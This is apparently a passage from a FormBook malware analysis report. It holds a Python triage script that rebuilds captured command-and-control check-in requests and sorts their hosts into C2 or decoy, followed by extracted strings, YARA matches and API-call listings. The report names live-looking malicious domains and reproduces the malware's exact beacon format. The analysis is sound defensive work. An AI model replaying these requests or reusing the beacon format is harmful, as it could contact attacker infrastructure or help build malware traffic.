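"adaptive.science", "meeplesisters.com", "shubhkari.com", "pooliswaiting.com", "sempat-ya8.com",
"davispackphotography.com", "dezigo.design", "faxbbs.com", "lunarvac.com", "thewerideveloper.com",
"ingenesinstitute.com", "elizabethfulco.com", "assemble-4u.com", "jingcilian.com", "rnpynsjw.net",
"raphainfosec.com", "gdzas08.cloud", "murrpurrs.net", "hakua36tokyo.com", "rakennuskolibri.net",
"renerossi.com", "raphaelyejesiel.com", "phoxinh.net", "amrshadhartanah21.com", "thehoneyglo.com",
"xn--mariachilen-zeb.com", "excelfaq.online", "expandetusingresos.com", "cupsteam.com",
"your-new-body-plan.com", "misskarenenglishreacher.com", "pulkitkumar.wtf", "tluxebeautyexperience.com",
"sissysundays.com", "ketoburnerrevolution.com", "babdestaffing.com", "easywayplanet.com", "rewealth.club",
"siamboss.com", "shamansmoke.com", "truervoice.com", "denisekohli.com", "gx17.net"]}""")


def _get(host: str, fza: str) -> bytes:
    """One captured request rebuilt from the report: only Host and Connection
    headers (no User-Agent), followed by the 7-byte all-NUL body it printed."""
    return (f"GET /owws/?FZA={fza}&GzrX=Bxo0src HTTP/1.1\r\nHost: {host}\r\n"
            f"Connection: close\r\n\r\n").encode() + b"\x00" * 7


CAPTURED = [  # the eight GET requests listed above, in the report's order
    _get("www.abaplants.com", "E2uPX13Kd8eziNpXwTixT+siYJwH/w0JmCiJBsiXejl5IKklxd2VA8+t7/1UF0B3bHAe"),
    _get("www.cyjulebu.com", "LNtcZ4o3RSbiM3q1XP5+3qPXxFdWCQL8FVzehDhzTe1h59sjzavkswLHMrOSN2WRyLvP"),
    _get("www.denisekohli.com", "lwHO/uUGh/aXRG65LDVUqOi7qNbSmHJrcCZCAEgZXo9YpRM01PmoothBQXBavnYq4fuq"),
    _get("www.hostsnc.com", "4P1MPend6t3dRr+zrFZAhnBbaZyC76urNt6lzZx4zgRAaIR2wDCeIn43mJ71sHhZDUem"),
    _get("www.assemble-4u.com", "tHbMDDeadmVNgKYcreuncRwf7boUCKl6MNzrWMM5Jrdb4IpAp8+CGbWYAVkD3n9oZQag"),
    _get("www.raphaelyejesiel.com", "Ng1hVjXym9Qjh/39zAZuuRZY5wWd2+1a+DNcin6p0h8GUL41G3Uc3DOSlbUNOeobFB2Q"),
    _get("www.your-new-body-plan.com", "wQPVVaqxY2IiVfQZkyRmW3q13fIzlgC5jJ34SIKwtgCZdzYlbOYBx3wkbgC3baC7Oc7O"),
    _get("www.softwaresreports.info", "5jCx8TJ67BDPxitFKTiPzVbAv5V4WmfLvz0iUotKb81cdHhoP6D4U31cAoF9J0eWw3xa"),
]


def parse_request(raw: bytes) -> Dict[str, Any]:
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("ascii", "replace").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {k.strip().lower(): v.strip()
               for k, _, v in (line.partition(":") for line in lines[1:])}
    url = urlsplit(target)
    # Split the query by hand: parse_qs would turn '+' into a space, which is
    # exactly what the decoy server did in the 404 body the report captured.
    query = dict(kv.split("=", 1) if "=" in kv else (kv, "")
                 for kv in url.query.split("&") if kv)
    return {"method": method, "path": url.path, "query": query, "headers": headers, "body": body}


def checkin_indicators(req: Dict[str, Any], cfg: Dict[str, Any]) -> Dict[str, bool]:
    """Traits of the check-in shape seen in the report, each True/False."""
    c2_path = urlsplit("//" + cfg["C2 list"][0]).path
    q, h = req["query"], req["headers"]
    first = next(iter(q.values()), "")
    return {
        "get": req["method"] == "GET",
        "c2_path": req["path"] == c2_path,
        "two_params": len(q) == 2,
        "long_b64_value": re.fullmatch(r"[A-Za-z0-9+/=]{40,}", first) is not None,
        "no_user_agent": "user-agent" not in h,
        "connection_close": h.get("connection", "").lower() == "close",
        "nul_body": bool(req["body"]) and set(req["body"]) == {0},
    }


def is_checkin(req: Dict[str, Any], cfg: Dict[str, Any]) -> bool:
    return all(checkin_indicators(req, cfg).values())


def _bare(host: str) -> str:
    h = host.lower()
    return h[4:] if h.startswith("www.") else h


def classify_host(host: str, cfg: Dict[str, Any]) -> str:
    """'c2' for the configured C2 host, 'decoy' for a decoy-list entry (a www.
    prefix is ignored on both sides), else 'unknown'."""
    c2 = {_bare(urlsplit("//" + u).hostname or "") for u in cfg["C2 list"]}
    if _bare(host) in c2:
        return "c2"
    return "decoy" if _bare(host) in {_bare(d) for d in cfg["decoy"]} else "unknown"


def summarize(raws: List[bytes], cfg: Dict[str, Any]) -> List[Tuple[str, str, bool]]:
    """(host, classification, looks like a FormBook check-in) per request."""
    rows = []
    for raw in raws:
        req = parse_request(raw)
        host = req["headers"].get("host", "")
        rows.append((host, classify_host(host, cfg), is_checkin(req, cfg)))
    return rows


if __name__ == "__main__":
    for host, cls, chk in summarize(CAPTURED, CONFIG):
        print(f"{host:28} {cls:8} checkin={chk}")
```

The classification is what decides the response: a "decoy" row is evidence of infection but its destination must not be blocked or attributed as C2 infrastructure, while the configured C2 host belongs on the blocklist even though it never appeared on the wire during this run.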
Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp | String found in binary or memory: <a href="https://www.facebook.com/casarpontocom" target="_blank" title="Facebook/casarpontocom"> equals www.facebook.com (Facebook)
Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp | String found in binary or memory: <a href="https://www.youtube.com/casarpontocom" target="_blank" title="Youtube/casarpontocom"> equals www.youtube.com (Youtube)
Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp | String found in binary or memory: <iframe src="//www.facebook.com/plugins/like.php?href=https%3A%2F%2Ffacebook.com%2FEventoCasar&width&layout=button_count&action=like&show_faces=false&share=false&height=21&appId=621352837957736" scrolling="no" frameborder="0" style="border:none; overflow:hidden; height:21px;" allowTransparency="true"></iframe> equals www.facebook.com (Facebook)
Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp | String found in binary or memory: src="https://www.facebook.com/tr?id=912779795420526&ev=PageView&noscript=1" equals www.facebook.com (Facebook)
Source: unknown | DNS traffic detected: queries for: www.abaplants.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Tue, 23 Feb 2021 07:57:48 GMT | Content-Type: text/html | Content-Length: 1039 | Connection: close | Set-Cookie: security_session_verify=9ebc6a29fa9e7c317eed3150247f3800; expires=Fri, 26-Feb-21 15:57:48 GMT; path=/; HttpOnly | Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 | Data (the report's hex dump, decoded to ASCII; the capture is truncated): <!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/><meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate, post-check=0, pre-check=0"/><meta http-equiv="Connection" content="Close"/><script type="text/javascript">function stringToHex(str){var val="";for(var i = 0; i < str.length; i++){if(val == "")val = str.charCodeAt(i).toString(16);else val += str.charCodeAt(i).toString(16);}return val;}function YunSuoAutoJump(){ var width = screen.width; var height=screen.height; var screendate = width + "," + height;var curlocation = window.location.href;if(-1 == curlocation.indexOf("security_verify_")){ document.cookie="srcurl=" + stringToHex(window.location.href) + ";path=/;";}self.location = "/owws/?FZA=LNtcZ4o3RSbiM3q1XP5 3qPXxFdWCQL8FVzehDhzTe1h59sjzavkswLHMrOSN2WRyLvP&GzrX=B [truncated]
Note: the FZA value echoed in the script is the one sent to www.cyjulebu.com, so this is that decoy's answer: a 404 carrying a JavaScript cookie-and-redirect anti-bot challenge (the function is named YunSuoAutoJump), not a FormBook C2 response. The server also decoded the '+' in the query value to a space, which matters if the request is replayed or re-encoded.
The remaining strings are font-foundry licensing URLs from mapped font files and, in chkdsk.exe, social-media links from an HTML page held in its memory; none of them is a network indicator.
Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.232661881.000000000121D000.00000004.00000001.sdmp | String found in binary or memory: http://en.wX
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp | String found in binary or memory: http://instagram.com/casarpontocom
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.261901918.0000000007260000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.microsoft.nh
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.253563451.00000000059E0000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comaYn
Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.253563451.00000000059E0000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comoitu
Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.253563451.00000000059E0000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comon
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.233155052.00000000059FB000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.comX
Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.233155052.00000000059FB000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.come
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, ORDER SPECIFICATIONS.exe, 00000000.00000003.234915943.00000000059E4000.00000004.00000001.sdmp, ORDER SPECIFICATIONS.exe, 00000000.00000003.234874416.0000000005A1D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.235177312.00000000059E4000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, ORDER SPECIFICATIONS.exe, 00000000.00000003.236733624.00000000059E4000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.236733624.00000000059E4000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/Micr
Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.236733624.00000000059E4000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/dn
Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.236733624.00000000059E4000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/ico
Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.236733624.00000000059E4000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp | String found in binary or memory: http://www.pinterest.com/casarpontocom
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, ORDER SPECIFICATIONS.exe, 00000000.00000003.233207946.00000000059FB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.233044903.00000000059FB000.00000004.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.coma-d
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.234237194.00000000059E6000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.krF
            Source: explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.233440991.00000000059FB000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comBR
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.233440991.00000000059FB000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comtn
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.233419468.00000000059FB000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comxR
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://casarpontocom.zendesk.com/hc/pt-br
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://embed.typeform.com/embed.js
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://plus.google.com/
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/casamentos/casamentos-reais/
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/casamentos/decoracao-de-casamento/
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/cha-de-panela/
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/lua-de-mel-2/
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/noivas/dicas-para-noivas/
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/noivas/vestidos-de-noiva/
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/organizacao/
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-N7Z9MZC
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/casarpontocom

            E-Banking Fraud:

            Yara detected FormBook
            Source: Yara match | File source: 00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.ORDER SPECIFICATIONS.exe.3c2d0a0.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.ORDER SPECIFICATIONS.exe.3c7ccc0.3.raw.unpack, type: UNPACKEDPE

            System Summary:

            Malicious sample detected (through community Yara rule)
            Source: 00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
            Source: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
            Source: 00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
            Source: 00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
            Source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
            Source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
            Source: 0.2.ORDER SPECIFICATIONS.exe.3c2d0a0.4.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.ORDER SPECIFICATIONS.exe.3c2d0a0.4.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
            Source: 0.2.ORDER SPECIFICATIONS.exe.3c7ccc0.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.ORDER SPECIFICATIONS.exe.3c7ccc0.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
            .NET source code contains very large strings
            Source: ORDER SPECIFICATIONS.exe, LogIn.cs | Long String: Length: 13656
            Source: LvZiFDk.exe.0.dr, LogIn.cs | Long String: Length: 13656
            Source: 0.0.ORDER SPECIFICATIONS.exe.6a0000.0.unpack, LogIn.cs | Long String: Length: 13656
            Source: 0.2.ORDER SPECIFICATIONS.exe.6a0000.0.unpack, LogIn.cs | Long String: Length: 13656
            Source: 4.2.ORDER SPECIFICATIONS.exe.160000.0.unpack, LogIn.cs | Long String: Length: 13656
            Source: 4.0.ORDER SPECIFICATIONS.exe.160000.0.unpack, LogIn.cs | Long String: Length: 13656
            Source: 5.0.ORDER SPECIFICATIONS.exe.ac0000.0.unpack, LogIn.cs | Long String: Length: 13656
            Source: 5.2.ORDER SPECIFICATIONS.exe.ac0000.1.unpack, LogIn.cs | Long String: Length: 13656
            Initial sample is a PE file and has a suspicious name
            Source: initial sample | Static PE information: Filename: ORDER SPECIFICATIONS.exe
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_004181B0 NtCreateFile,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_00418260 NtReadFile,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_004182E0 NtClose,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_00418390 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_004181AB NtCreateFile,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_0041838A NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_01509910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_015099A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_01509840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_01509860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_015098F0 NtReadVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_01509A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_01509A00 NtProtectVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_01509A20 NtResumeThread,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_01509540 NtReadFile,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_015095D0 NtClose,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_01509710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_01509FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_01509780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_015097A0 NtUnmapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_01509660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_015096E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_01509950 NtQueueApcThread,
